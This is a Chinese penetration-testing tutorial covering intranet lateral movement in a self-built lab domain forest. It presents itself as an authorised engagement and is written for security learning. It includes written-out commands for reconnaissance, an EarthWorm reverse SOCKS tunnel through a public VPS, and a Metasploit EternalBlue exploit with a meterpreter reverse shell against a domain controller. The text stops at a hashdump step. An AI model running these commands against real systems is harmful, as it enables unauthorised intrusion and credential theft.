渗透测试之地基内网篇:域森林中实战攻防(下) – 作者:dayuxiyou

系列文章

专辑:渗透测试之地基篇

简介

渗透测试-地基篇

该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。

请注意

本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。

名言:

你对这行的兴趣,决定你在这行的成就!

一、前言

渗透测试人员需谨记《网络安全法》,根据《网络安全法》所示,未经授权的渗透测试都是不合法的,不管是出于何种目的。红队渗透人员在进行渗透期间,渗透测试的行为和项目必须在被渗透方授予权限可渗透后,才可进行渗透测试操作。

如今有一家dayu公司,需要对自己的业务以及整体的内网框架体系进行隐患挖掘,授予权限我进行对dayu公司的渗透测试操作,在签署了双方的《渗透测试授权书》后,我开始了对dayu公司的渗透之旅。

跳开思维讲,我此篇内容是内网渗透篇章,通过我的专栏:

社工钓鱼 -> 免杀过全杀软 -> 内网渗透 

那么我通过了社工钓鱼的各种方式,将钓鱼文件进行免杀后,成功钓鱼到了该公司外围人员计算机,并控制了该计算机权限获得shell,并成功登录对方电脑。

通过前期对域用户大量的信息收集,画出了相对应的简单网络拓扑图,下一步需要进攻子域控制器,思路如下:

域普通用户 -> 子域控制器 -> 父域控制器 -> 辅域控制器 -> 财务独立域 -> 涉密系统

通过该思路进攻即可,还有另外一条思路:

域普通用户 -> 10.10.21.0/24二级区域 -> 父子域控制器 -> 横向延伸(财务独立域10.10.21.0/24)

渗透人员最爱系统之一有kali,还有各类windows集成的武器库系统,通过前几期的域森林专辑文章中利用隐藏通道技术、权限提升、横向攻击、域控安全技术、跨域攻击、置零攻击等手段对公司进行了大面积渗透行为,今天我们就来对域森林中进行实战攻防演练,利用前期学到的方法在内网中遨游!

二、环境介绍

目前信息收集获得的网络情况:(模拟环境)
拓扑图简介

1625103785_60dd1da90e4f26253004f.png!small?1625103785456

为了更好的演示接下来的渗透和回看总拓扑图公司搭建环境情况:

单篇:渗透测试之地基内网篇:域森林中父子域和辅域用户搭建分析

实战是结合所有知识思路的集合体,只有实战才能检验能力的时刻,也只有实战才能更快的进步和检验错误,接下来将介绍如何一步步攻破内网域森林环境!

三、内网信息收集

1、获取多内网

1625103795_60dd1db33cdddc54ab7bd.png!small?1625103797713

arp -a

发现存在内网10.10.21.0/24网段!继续横向!

2、获取内网网卡

1)上传nbtscan:

1625103802_60dd1dbae4b344fa8e752.png!small?1625103806759

2)扫描内网段:

1625103808_60dd1dc00861463c3d83d.png!small?1625103809349

3)发现DC独立域:

1625103813_60dd1dc5711c2d79f5bd5.png!small?1625103817401

10.10.21.2!

四、建立二级代理

目前目标机器不出网的情况下需要建立反向代理,这里使用EW进行二级代理!

1、公网VPS

首先在VPS上执行:

1625103822_60dd1dce732a1bc88dd6d.png!small?1625103823584

ew_for_Win.exe -s lcx_listen -l 1080 -e 888

即在公网VPS中添加转接隧道,将1080端口收到的代理请求转发给888端口。

2、子域控制器

1)CS上传EW文件:

1625103828_60dd1dd4e9074853bbbc1.png!small?1625103832269

2)子域控制器主机执行,利用socksd方式启动999端口的SOCKS代理:

1625103835_60dd1ddbf0700ffb5599f.png!small?1625103838113

shell ew_for_Win.exe -s ssocksd -l 999

3、普通域用户

1)CS上传EW文件:

1625103842_60dd1de232c12a6ca4369.png!small?1625103845273

2)普通域用户机器主机执行,即将VPS的888端口和普通域用户主机的999端口连接起来:

1625103848_60dd1de8149f56386a72f.png!small?1625103852127

shell ew_for_Win.exe -s lcx_slave -d 192.168.253.38 -e 888 -f 10.10.3.6 -g 999

执行后运行代理工具全局即可!

五、攻击独立域控制器

目前可知域控DC:10.10.21.2

1)MSF链接EW隧道代理

1625103855_60dd1def657d06253554f.png!small?1625103856325

setg Proxies socks5:192.168.253.38:1080
setg ReverseAllowProxy true

2)扫描是否存在ms17_010

search寻找ms17_010模块:

1625103861_60dd1df5dd931e006bb03.png!small?1625103865369

search ms17_010

3)扫描永恒之蓝

1625103867_60dd1dfb756aee1bead9f.png!small?1625103872530

use auxiliary/scanner/smb/smb_ms17_010
set rhosts 10.10.21.2
run

可看到回显一直对方系统为Windows Server 2008 x64系统,存在永恒之蓝漏洞!

4)EXP攻击独立域

1625103874_60dd1e024ea6ea902157b.png!small?1625103892009

1625103879_60dd1e077df1b70afbeae.png!small?1625103894617

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/meterpreter/reverse_tcp
set rhosts 10.10.21.2
run

5)成功交互

双网卡:

1625103886_60dd1e0e2bedd0943a2a8.png!small?1625103894617

10.10.21.2
172.16.5.2

六、独立域信息收集

1、hashdump导出密码哈希

162510

来源:freebuf.com 2021-07-01 09:42:00 by: dayuxiyou

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论